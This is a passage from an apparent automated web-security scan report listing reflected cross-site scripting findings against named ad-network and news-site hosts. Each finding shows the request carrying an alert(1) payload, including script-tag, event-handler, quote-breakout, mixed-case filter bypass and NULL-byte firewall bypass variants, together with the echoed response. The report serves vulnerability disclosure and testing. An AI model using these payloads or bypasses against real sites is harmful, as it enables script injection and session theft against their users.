Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 614
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=b9b1f';alert(1)//4f2061d893a,1a0a560b5ac81252e91
...[SNIP]...

2.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38af1"%3balert(1)//1c872f3fc6c was submitted in the q parameter. This input was echoed as 38af1";alert(1)//1c872f3fc6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=38af1"%3balert(1)//1c872f3fc6c&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236:305,235949|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24:0,10#0,24;expires=Wed, 12 Oct 2011 12:48:43 GMT;path=/;domain=.zedo.com;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:43 GMT
Content-Length: 6518
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=38af1";alert(1)//1c872f3fc6c,1a0a560b5ac81252e9141598,1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


       
...[SNIP]...

2.31. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f095e'%3balert(1)//7fb6e4adbf8 was submitted in the $ parameter. This input was echoed as f095e';alert(1)//7fb6e4adbf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=f095e'%3balert(1)//7fb6e4adbf8&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 478
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';alert(1)//7fb6e4adbf8,ad769';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=12:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e';alert(1)//7fb6e4adbf8,ad769'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';alert(1)//7fb6e4adbf8,ad769';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

2.32. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c30'%3balert(1)//e63561c611c was submitted in the q parameter. This input was echoed as 80c30';alert(1)//e63561c611c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=80c30'%3balert(1)//e63561c611c&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 528
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560ba8d0f92af69b0c49,5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=10:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=80c30';alert(1)//e63561c611c,1a0a560ba8d0f92af69b0c49,5406e';z="+Math.random();}

if(zzuid=
...[SNIP]...

2.33. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 9d4a0<script>alert(1)</script>dfdd840350b was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont199d4a0<script>alert(1)</script>dfdd840350b&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:38 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6674
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-itl",iconSpanId:"te-clr1-1d4bc8b5-f459-45d2-9d9b-7185b46bfc5d-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"abs01cont199d4a0<script>alert(1)</script>dfdd840350b",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_1d4bc8b5_f459_45d2_9d9b_7185b46bfc5d_ib,interstitialWidth:728,interstitialHei
...[SNIP]...

2.34. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 94f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&c=abs01cont19&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6752
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=109&pid=mec01&aid=abs01&cid=0811abs728x9094f4e<ScRiPt>alert(1)</ScRiPt>241f43fb5a&w=728&h=90" target="_blank">
...[SNIP]...

2.35. http://cm.npc-morris.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca685"><script>alert(1)</script>7a61d61a441 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF2dXM0MAI45Nxww=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:46 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685"><script>alert(1)</script>7a61d61a441" type="text/css">
...[SNIP]...

2.36. http://dailydeals.savannahnow.com/widgets/300x250 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dailydeals.savannahnow.com
Path:   /widgets/300x250

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 was submitted in the REST URL parameter 2. This input was echoed as 9aab3<img src=a onerror=alert(1)>b54fa5f1680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /widgets/300x2509aab3<img%20src%3da%20onerror%3dalert(1)>b54fa5f1680 HTTP/1.1
Host: dailydeals.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Mon, 12 Sep 2011 12:46:15 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 80

Could not find the template: 300x2509aab3<img src=a onerror=alert(1)>b54fa5f1680

2.37. http://go.savannahnow.com/partner_json/search [jsonsp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 5a2f8<script>alert(1)</script>96b82a10b8e was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_05a2f8<script>alert(1)</script>96b82a10b8e HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 95
ETag: "dd325e227c05454e7cb9131302f53e61"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 40ceae8c13c9e185408d91ae53049dba4bf265fc
Z-REQUEST-HANDLED-BY: www16
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2882

jsp_05a2f8<script>alert(1)</script>96b82a10b8e('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011","zurl
...[SNIP]...

2.38. http://go.savannahnow.com/partner_json/search [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload %007c843<script>alert(1)</script>4e254564077 was submitted in the limit parameter. This input was echoed as 7c843<script>alert(1)</script>4e254564077 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=10%007c843<script>alert(1)</script>4e254564077&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.name%2Cvenue.id&where=savannah%2C+ga&radius=&v=&tag=&what=&when=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: go.savannahnow.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 12 Sep 2011 12:49:18 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 178
ETag: "2865bab473716d7743b16d03277163cf"
Z-DETECTED-FLAVOR: go_flavor |
X-Content-Digest: 20dedd0ce3207e873334ffc6054c1ecef3c12fd0
Z-REQUEST-HANDLED-BY: www11
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2883

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Darius Rucker","has_tickets":true,"tickets_on_sale":null,"venue_id":854691,"id":172970805,"starttime":"Fri Sep 16 19:00:00 UTC 2011"
...[SNIP]...
e":-81.0965,"state":"GA"},"sort":0,"offset":0,"when":"","what":"","catex":null,"limit":10,"sst":1315785600},"next_page":true,"identifier": "st=event,event_spn&where=savannah%2Cga&ssi=0&ssrss=1&srss=10.7c843<script>alert(1)</script>4e254564077"}}})')

2.39. http://go.savannahnow.com/partner_json/search [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://go.savannahnow.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 4eca2<script>alert(1)</script>359798be485 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

